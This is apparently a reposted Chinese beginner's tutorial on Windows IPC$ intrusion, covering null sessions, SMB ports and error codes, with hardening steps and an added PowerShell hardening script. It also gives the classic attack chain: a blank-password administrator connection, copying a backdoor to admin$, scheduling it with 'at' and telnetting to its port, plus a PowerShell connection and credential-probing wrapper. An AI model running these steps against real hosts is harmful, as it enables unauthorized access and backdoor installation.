A detailed look at IPC$ intrusion

xiaoxiao  2021-03-06

Original: IQST (iqst)  Source: Vegetable Bird Community (菜鸟社区) http://ccbirds.yeah.net  [ccbirds Getting Started Tutorial]

One. Preface

Articles about IPC$ intrusion are everywhere online, and the attack steps have practically become a classic template, so nobody wants to write about this outdated topic any more. Even so, I think those articles are not detailed enough. For someone touching IPC$ for the first time, the bare list of intrusion steps does not answer their many questions (just search any hacking forum for "IPC" and see how many there are). So this post is meant as a set of answers: I want to clear up the points that are easy to confuse, so that everyone does not keep getting stuck at the same place. If you still have questions after reading, reply right away.

Two. What IPC$ is

IPC$ (Internet Process Connection) is a resource shared as a "named pipe" (that is how everyone describes it). Named pipes used for inter-process communication are exposed over the network; by verifying a user name and password the connecting side obtains the corresponding permissions, and can remotely manage the computer and view its shared resources. With IPC$, the connecting side can even establish a null session with the target host without any user name or password (the target must have the IPC$ share open, otherwise no connection is possible), and through that null session it can obtain the target's user list (although a responsible administrator will prohibit exporting the user list).

We always talk about "the IPC$ vulnerability", but IPC$ is not really a vulnerability. It is a remote network logon feature opened to make the administrator's remote management easier, and it also opens the default shares, namely every logical disk (C$, D$, E$ ...) and the system directory WINNT or Windows (admin$). All of this was intended for the administrator's convenience, but good intentions do not always produce good results: people with bad intentions (who? I don't know, "they" is a pronoun) use IPC$ to access the shared resources, export the user list, and run dictionary tools to guess passwords, hoping to obtain higher privileges and achieve their shady goals.

Note:
1) An IPC$ connection is a remote network logon feature unique to Windows NT and later; its function is equivalent to Telnet in UNIX. Because IPC$ needs many DLL functions of Windows NT, it cannot run on Windows 9x. That is, only NT/2000/XP can establish an IPC$ connection; 98/ME cannot (some friends say a null session can be built from 98; I don't know whether that is true, but it is 2003 now and I suggest that comrades on 98 change their system, 98 is not cool).
2) Even a null session can only be established if the other side has the IPC$ share open; if it is closed you still cannot connect.
3) Establishing an IPC$ connection does not guarantee you can view the other side's user list, because the administrator can disable user-list export.

Three. The role of IPC$ connections in a hack

As mentioned above, even with only a null session you can obtain a lot of information (and that information is often the prerequisite for an intrusion) and access part of the shares. If you can log on as a user with certain permissions, you get those permissions; obviously, if you log on as an administrator, heh, nothing more needs to be said, what u want, u can do!! (Basically: get target information, manage the target's processes and services, upload a trojan and run it, and if it is 2000 Server, consider opening Terminal Services for convenient control. How is that? Enough!)

But don't get excited too early, because the administrator's password is not that easy to get. There are some careless administrators with blank passwords or silly passwords, but they are a minority, and it is not like it used to be: as security awareness improves, administrators have become more careful, and getting the administrator's password will be harder and harder :( So most likely you will connect with minimal permissions, and you will slowly discover that IPC$ connections are not universal; when the host does not have IPC$ sharing on, you cannot connect at all. So I think you should not treat IPC$ intrusion as the ultimate weapon, or think it will win the battle on its own. It is like a pass in front of the goal on a football field: rarely fatal by itself, but indispensable. That, I think, is what IPC$ connections mean for a hack.

Four. The relationship between IPC$, null sessions, ports 139/445, and the default shares

The relationship between these four is probably the thing that confuses beginners most, and most articles do not explain it specially. My own understanding is not very deep either; all of this was summed up from discussions with everyone (a BBS with good discussion can be said to be a rookie's paradise).

1) IPC$ and null sessions: an IPC$ connection that needs no user name or password is a null session. Once you log on as a user or administrator (that is, an IPC$ connection with a specific user name and password), it can no longer be called a null session. Many people ask: since a null session works, why spend enormous effort scanning for weak passwords? Well, when you log on with a null session you have almost no permissions (very depressing), whereas when you log on as a user or administrator you have the corresponding permissions (who doesn't want permissions? So be honest and don't be lazy).

2) IPC$ and ports 139/445: an IPC$ connection allows remote logon and access to the default shares; port 139 is enabled by the NetBIOS protocol, and access to shared files and printers is carried over port 139 and (on Win2000) port 445. Therefore IPC$ needs port 139 or 445 to be reachable.

3) IPC$ and the default shares: the default shares are the shares opened by default to make the administrator's remote management easier (you can of course turn them off), namely every logical disk (C$, D$, E$ ...) and the system directory WINNT or Windows (admin$). Through IPC$ we can access these default shares (provided the other side has not closed them).

Five. Reasons an IPC$ connection fails

The following five reasons are the most common:
1) your own system is not NT or later;
2) the other side has not opened the IPC$ default share;
3) the other side has not opened port 139 or 445 (for example, a firewall is masking them);
4) your command was typed incorrectly (a space wrong, etc.);
5) wrong user name or password (for a null session this of course does not apply).

You can also analyse the cause from the error number:
Error 5, access is denied: most likely the user you are using does not have administrator privileges; raise your privileges first.
Error 51, Windows cannot find the network path: the network has a problem.
Error 53, the network path was not found: the IP address is wrong; the target's LanmanServer service is not started; the target has a firewall (port filtering).
Error 67, the network name cannot be found: your own LanmanWorkstation service is not started; the target has deleted IPC$.
Error 1219, the credentials supplied conflict with an existing set of credentials: you have already established an IPC$ connection with the other side; delete it and reconnect.
Error 1326, unknown user name or bad password: the reason is obvious.
Error 1792, an attempt was made to log on but the network logon service was not started: the target's Netlogon service is not started (this appears when connecting to a domain).
Error 2242, the password of this user has expired: the target has an account policy that forces periodic password changes.

IPC$ also has more complicated problems: besides the reasons above there are other uncertain factors that I cannot list in detail; it depends on everyone's own experience and experimenting.

Six. How to open the target's IPC$ (this section is taken from related articles)

First you need a shell that does not depend on IPC$, such as SQL Server's CMD extension, Telnet, or a trojan; of course that shell must have admin privileges. Then run the command net share ipc$ in that shell to open IPC$. From then on IPC$ can be used as described above. Please confirm that the related services are running; if they are not, start them (if you don't know how, see the usage of the NET command). If it still does not work (for example a firewall is in the way, or the process gets killed), it is recommended to give up.

Seven. How to defend against IPC$ intrusion

1. Prohibit null sessions (this setting does not prevent a null session from being established; quoted from "Anatomy of Win2000"): run regedit, find the key [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa] and change the DWORD value RestrictAnonymous to 00000001 (if you set it to 2, some things such as certain Windows services will have problems).

2. Prohibit the default shares
1) Look at the local shared resources: Run - cmd - enter net share
2) Delete the shares (one per line, press Enter after each):
net share ipc$ /delete
net share admin$ /delete
net share c$ /delete
net share d$ /delete (if there are e, f, ... keep deleting)
3) Stop the Server service: net stop server /y (the Server service starts again after a reboot)
4) Modify the registry: Run - regedit. Server versions: find the key [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters] and change the DWORD value AutoShareServer to 00000000. Pro versions: under the same key change the DWORD value AutoShareWks to 00000000. If the value does not exist, create it (right-click - New - DWORD value) and then set it.

3. Permanently close IPC$ and the default shares, which depend on the Server service (LanmanServer): Control Panel - Administrative Tools - Services - find the Server service - Properties - General - Startup type - Disabled.

4. Install a firewall (choose the related settings), or use port filtering (filter out 139, 445, etc.), or use a recent version of Optimization Master (优化大师).

5. Set a complex password to defend against password guessing through IPC$.

(This tutorial is updated irregularly; for the latest version please visit the official site: Vegetable Bird Community http://ccbirds.yeah.net)

Eight. Related commands

1) Establish a null session: net use \\IP\ipc$ "" /user:"" (pay attention: this command contains 3 spaces)
2) Establish a non-null connection: net use \\IP\ipc$ "password" /user:"user name" (also 3 spaces)
3) Map a default share: net use z: \\IP\c$ "password" /user:"user name" (maps the other side's C drive to your own Z drive; other drives likewise). If an IPC$ connection has already been established with the target, you can map with the existing credentials directly: net use z: \\IP\c$
4) Delete the IPC$ connection: net use \\IP\ipc$ /del
5) Delete a share mapping: net use z: /del deletes the mapped Z drive, other drives likewise; net use * /del deletes all of them, with a prompt you answer with y to confirm.

The "classic" intrusion mode below has been introduced in most IPC$ tutorials, so I will reproduce it too; thanks to the original author (I don't know which senior it was).

1. C:\>net use \\127.0.0.1\IPC$ "" /user:"administrator"
This is an address found with the Fluxay (流光) scanner where the user name is administrator and the password is blank (an empty password; lucky you). If you want to attack it, use a command like this to establish a connection with 127.0.0.1. Because the password is blank, nothing is entered between the first pair of quotes; the second pair of quotes holds the user name, administrator. The command completed successfully.
2. C:\>copy srv.exe \\127.0.0.1\admin$
Copy srv.exe over first (it is in Fluxay's Tools directory). admin$ is the other side's system directory, C:\WINNT (not System32). You could also use C$ or D$, meaning the C drive and D drive, depending on where you want to copy to.
3. C:\>net time \\127.0.0.1
Check the time: the current time of 127.0.0.1 is 2002/3/19 11:00 am, the command completed successfully.
4. C:\>at \\127.0.0.1 11:05 srv.exe
Start srv.exe with the at command (the time set here must be later than the host's current time, otherwise how would it start, heh!).
5. C:\>net time \\127.0.0.1
Check the time again. Is it time yet? If the current time of 127.0.0.1 is 2002/3/19 11:05 am, get ready to run the next command.
6. C:\>telnet 127.0.0.1 99
Here we use the telnet command; note that the port is 99.
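As an added example, not part of the original tutorial: a PowerShell wrapper around the net use line from section Eight that first checks the prerequisites from section Five (your own Workstation service, port 445 or 139 reachable), then attempts the connection (null session when no user is given) and translates the error number into the causes the tutorial lists. The target 192.0.2.10, the credentials, and the function and switch names are placeholders; the error-message regex assumes an English Windows.

```powershell
# Added example (not from the original tutorial): wrap "net use \\IP\ipc$" and
# interpret a failure the way section Five does. Target, user and password are
# assumptions; 192.0.2.10 is a documentation address, replace it with a real host.
function Test-IpcConnection {
    param(
        [Parameter(Mandatory)] [string] $Target,
        [string] $User = '',        # empty user and password = null session (section Eight, 1)
        [string] $Password = '',
        [switch] $KeepSession       # by default the connection is deleted again afterwards
    )

    # Error 67 on our side: the local LanmanWorkstation service must be running.
    $ws = Get-Service -Name LanmanWorkstation -ErrorAction SilentlyContinue
    if (-not $ws -or $ws.Status -ne 'Running') {
        return [pscustomobject]@{ Target = $Target; Connected = $false; Error = $null
                                  Cause = 'Local Workstation service (LanmanWorkstation) is not running' }
    }

    # Section Four/Five, reason 3: IPC$ rides on TCP 445 (direct SMB) or 139 (NetBIOS).
    $open = foreach ($p in 445, 139) {
        if (Test-NetConnection -ComputerName $Target -Port $p -InformationLevel Quiet -WarningAction SilentlyContinue) { $p }
    }
    if (-not $open) {
        return [pscustomobject]@{ Target = $Target; Connected = $false; Error = $null
                                  Cause = 'Neither TCP 445 nor 139 is reachable (host down, Server service off, or port filtering)' }
    }

    # The meanings below are the ones listed in section Five of the tutorial.
    $causes = @{
        5    = 'Access denied: the account lacks the needed rights (or anonymous access is restricted)'
        51   = 'Windows cannot find the network path: network problem'
        53   = 'Network path not found: wrong IP, target Server service stopped, or port filtering'
        67   = 'Network name not found: local Workstation service stopped, or the target deleted IPC$'
        1219 = 'Conflicting credentials: an IPC$ session to this host already exists, delete it first'
        1326 = 'Unknown user name or bad password'
        1792 = 'Network logon service not started: target Netlogon service is stopped (domain)'
        2242 = 'Password expired: the target enforces periodic password changes'
    }

    # Build the exact "net use" line from section Eight and run it through cmd.exe so the
    # empty "" arguments of a null session survive (PowerShell itself drops empty native args).
    $line = "net use \\${Target}\ipc`$ `"$Password`" /user:`"$User`""
    $out  = (cmd.exe /c $line 2>&1) -join "`n"

    if ($out -match 'completed successfully') {
        # Drop the session unless asked to keep it, otherwise the next attempt hits error 1219.
        if (-not $KeepSession) { cmd.exe /c "net use \\${Target}\ipc`$ /delete /y" | Out-Null }
        $how = if ($User) { "Authenticated as $User" } else { 'Null session accepted' }
        return [pscustomobject]@{ Target = $Target; Connected = $true; Error = 0; Cause = $how }
    }

    # English message format: "System error 53 has occurred." (localised systems differ)
    $code = if ($out -match 'System error (\d+)') { [int] $Matches[1] } else { -1 }
    $why  = if ($causes.ContainsKey($code)) { $causes[$code] } else { "Unrecognised output: $out" }
    return [pscustomobject]@{ Target = $Target; Connected = $false; Error = $code; Cause = $why }
}

# Usage against the assumed target: null session first, then an authenticated attempt.
Test-IpcConnection -Target 192.0.2.10
Test-IpcConnection -Target 192.0.2.10 -User 'administrator' -Password 'P@ssw0rd'
```

A null session that is "accepted" tells you only that IPC$ is open and port 139/445 is reachable; as section Four says, it carries almost no rights, and on a host with RestrictAnonymous set the enumeration that usually follows will fail even though the session itself succeeds.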
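The defence against the sequence above is section Seven. As an added example (not the tutorial's own commands), the same steps as one PowerShell script that sets RestrictAnonymous, sets AutoShareServer/AutoShareWks, deletes the special shares that exist right now, optionally blocks 139/445 at the host firewall or disables the Server service, and reads the state back. The RestrictAnonymousSAM value, the password-policy numbers and the function and switch names are assumptions not mentioned in the tutorial; the script needs an elevated prompt and the SmbShare and NetSecurity modules (Windows 8 / Server 2012 or later).

```powershell
# Added example (not from the original tutorial): apply the section Seven hardening in
# PowerShell and read the result back. Run elevated. Switch names are this script's own.
function Protect-DefaultShares {
    param(
        [switch] $RemoveIpc,             # section Seven also deletes IPC$; off by default, it breaks remote admin
        [switch] $BlockSmbInbound,       # item 4: filter 139/445 at the host firewall
        [switch] $DisableServerService   # item 3: the permanent option, no SMB serving at all afterwards
    )
    $lsa = 'HKLM:\SYSTEM\CurrentControlSet\Control\Lsa'
    $srv = 'HKLM:\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters'

    # Item 1: RestrictAnonymous=1. The tutorial warns that 2 breaks some services, and notes
    # that 1 only limits what a null session can enumerate; it does not refuse the session.
    New-ItemProperty -Path $lsa -Name RestrictAnonymous -PropertyType DWord -Value 1 -Force | Out-Null
    # Not in the tutorial: on XP and later this is the value that stops anonymous SAM
    # (user list) enumeration, which is what "export the user list" relies on.
    New-ItemProperty -Path $lsa -Name RestrictAnonymousSAM -PropertyType DWord -Value 1 -Force | Out-Null

    # Item 2 (4): stop the Server service recreating C$, D$, admin$ at its next start.
    # -Force creates the value if it is missing and overwrites it if present, which covers
    # the tutorial's "if the value does not exist, create it" step.
    New-ItemProperty -Path $srv -Name AutoShareServer -PropertyType DWord -Value 0 -Force | Out-Null
    New-ItemProperty -Path $srv -Name AutoShareWks    -PropertyType DWord -Value 0 -Force | Out-Null

    # Item 2 (2): delete the shares that exist right now (net share x$ /delete equivalent).
    # Without the registry change above they come back the next time the Server service starts.
    foreach ($s in (Get-SmbShare -Special $true -ErrorAction SilentlyContinue)) {
        if ($s.Name -eq 'IPC$' -and -not $RemoveIpc) { continue }
        Remove-SmbShare -Name $s.Name -Force
    }

    # Item 4: port filtering for 139 and 445 on the host itself.
    $ruleName = 'Block inbound SMB 139/445'
    if ($BlockSmbInbound -and -not (Get-NetFirewallRule -DisplayName $ruleName -ErrorAction SilentlyContinue)) {
        New-NetFirewallRule -DisplayName $ruleName -Direction Inbound -Protocol TCP `
            -LocalPort 139, 445 -Action Block -Profile Any | Out-Null
    }

    # Item 3: disable the Server service so IPC$ and the default shares cannot exist.
    if ($DisableServerService) {
        Set-Service -Name LanmanServer -StartupType Disabled
        Stop-Service -Name LanmanServer -Force
    }

    # Item 5: make dictionary guessing over IPC$ expensive. The numbers are assumptions.
    net accounts /minpwlen:14 /maxpwage:90 | Out-Null

    Get-DefaultShareState
}

# Read the state back so the change can be verified, and re-checked after a reboot,
# since "net share x$ /delete" alone does not survive one.
function Get-DefaultShareState {
    $lsa = 'HKLM:\SYSTEM\CurrentControlSet\Control\Lsa'
    $srv = 'HKLM:\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters'
    $l = Get-ItemProperty -Path $lsa -ErrorAction SilentlyContinue
    $p = Get-ItemProperty -Path $srv -ErrorAction SilentlyContinue
    [pscustomobject]@{
        RestrictAnonymous    = $l.RestrictAnonymous
        RestrictAnonymousSAM = $l.RestrictAnonymousSAM
        AutoShareServer      = $p.AutoShareServer
        AutoShareWks         = $p.AutoShareWks
        SpecialShares        = (Get-SmbShare -Special $true -ErrorAction SilentlyContinue).Name -join ', '
        ServerService        = (Get-Service -Name LanmanServer).Status
        SmbBlockRule         = [bool](Get-NetFirewallRule -DisplayName 'Block inbound SMB 139/445' -ErrorAction SilentlyContinue)
    }
}

# Usage: harden, keep IPC$ so remote administration still works, block SMB from outside.
Protect-DefaultShares -BlockSmbInbound
```

After running it, SpecialShares should list only IPC$ (or nothing with -RemoveIpc), and it should still read that way after a reboot; if C$ and admin$ are back, the AutoShare value was written to the wrong key for the edition (AutoShareServer on servers, AutoShareWks on workstations), exactly the distinction section Seven draws.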

Please credit the original address when reposting: https://www.9cbs.com/read-93047.html
